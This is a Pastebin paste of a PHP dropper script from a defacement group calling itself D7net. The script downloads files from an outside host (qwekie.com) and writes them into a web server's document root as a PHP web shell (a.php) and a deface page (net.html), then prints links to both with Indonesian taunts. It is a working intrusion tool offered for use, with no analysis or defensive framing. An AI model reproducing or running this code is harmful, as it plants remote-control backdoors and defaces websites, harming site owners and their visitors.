Advertisement
Guest User

waaw

a guest
Sep 29th, 2019
982
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.20 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <html><head>
  3. <title>Script Uploaded !</title>
  4. <center>
  5. </html>
  6. <?php
  7. function http_get($url){
  8. $d7net = curl_init($url);
  9. curl_setopt($d7net, CURLOPT_RETURNTRANSFER, 1);
  10. curl_setopt($d7net, CURLOPT_CONNECTTIMEOUT, 10);
  11. curl_setopt($d7net, CURLOPT_FOLLOWLOCATION, 1);
  12. curl_setopt($d7net, CURLOPT_HEADER, 0);
  13. return curl_exec($d7net);
  14. curl_close($d7net);
  15. }
  16. $check = $_SERVER['DOCUMENT_ROOT'] . "/a.php" ;
  17. $text = http_get('https://qwekie.com/test/a.txt');
  18. $open = fopen($check, 'w');
  19. fwrite($open, $text);
  20. fclose($open);
  21. if(file_exists($check)){
  22. echo $check."</br>";
  23. }else
  24. echo "Failed Gan Mungkin Server Nya :(";
  25. $web = "http://".$_SERVER['HTTP_HOST']."/";
  26. $check3=$_SERVER['DOCUMENT_ROOT'] . "/net.html" ;
  27. $text3 = http_get('https://qwekie.com/test/net.txt');
  28. $op3=fopen($check3, 'w');
  29. fwrite($op3,$text3);
  30. fclose($op3);
  31. if(file_exists($check3)){
  32. echo $check3."</br>";
  33. echo "Copyright © 2018 - D7net" ;
  34. }else
  35. echo "Failed Gan Mungkin Server nya :( ";
  36. echo "<br><br>Script Upload done ! <br><br> .\n " ;
  37. echo "Script Depes lu ~> <b><a href='$web/net.html' target='_blank'>d7.html</b></a>";
  38. echo "<br><br>Shell Lu ~> <b><a href='$web/a.php' target='_blank'>cok.php</b></a>";
  39. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement